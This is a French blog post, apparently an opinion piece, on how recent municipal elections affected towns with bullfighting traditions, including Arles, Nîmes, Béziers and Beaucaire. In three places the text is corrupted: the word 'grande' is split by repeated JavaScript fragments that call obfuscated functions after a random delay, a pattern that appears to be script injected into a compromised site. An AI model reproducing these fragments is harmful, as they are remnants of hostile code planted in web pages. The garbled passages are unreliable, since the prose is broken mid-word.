L’ARBRE QUI CACHE LA FORET

Placé sous les feux de la rampe lors des élections municipales, le versant oriental de la planète taurine française peut se sentir rasséréné tant les résultats marquent une forte stabilité dans la grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande majorité des villes de tradition en matière de corridas.

Significative s’avère à cet égard la réponse apportée aux antitaurins par la réélection au premier tour des maires d’Alès et de Rodilhan. Puisse une certaine presse en tirer leçon !

Les grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes plazas d’Arles ou de Nîmes, tout comme celle (de moindre catégorie) de Céret retrouveront pour interlocuteurs les maires sortants réélus dans leurs villes respectives, tout comme ce sera le cas dans la vingtaine d’arènes de troisième catégorie que compte la zone où la situation n’a guère connu de changements à l’exception de Carcassonne, dans l’Aude, passée de gauche à droite, et de Vauvert, dans le Gard, qui a fait l’inverse.

Comme on peut le voir : guère de quoi casser trois pattes à un canard (il y en a aussi dans le Sud Est) !

Reste l’inconnue de taille que constitue le Front National, dont on nous avait annoncé la déferlante. Saint Gilles, où Collard a attiré les caméras comme le feu les moustiques, a su échapper à la vague grâce à la grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande dignité du retrait de son maire sortant. Dans les Bouches du Rhône, Tarascon en a fait de même.

Au total ne restent donc que trois villes taurines où l’interrogation demeure quant au futur, ce qui est certes trop, beaucoup trop…

Béziers, dans l’Hérault, qui est incontestablement l’arbre qui cache la forêt, Beaucaire, dans le Gard et Fréjus dans le Var, qui constituent des cas d’espèces sur lesquels nous aurons sans doute l’occasion de revenir.

J’entends déjà les hauts cris des bonnes âmes qui menacent de ne plus fouler le sol de ces arènes.

De grâce : il n’est nul besoin de condamner à une double peine tous les malheureux aficionados que j’ai l’honneur, comme beaucoup d’autres, d’y connaître.

Les commentaires sont fermés.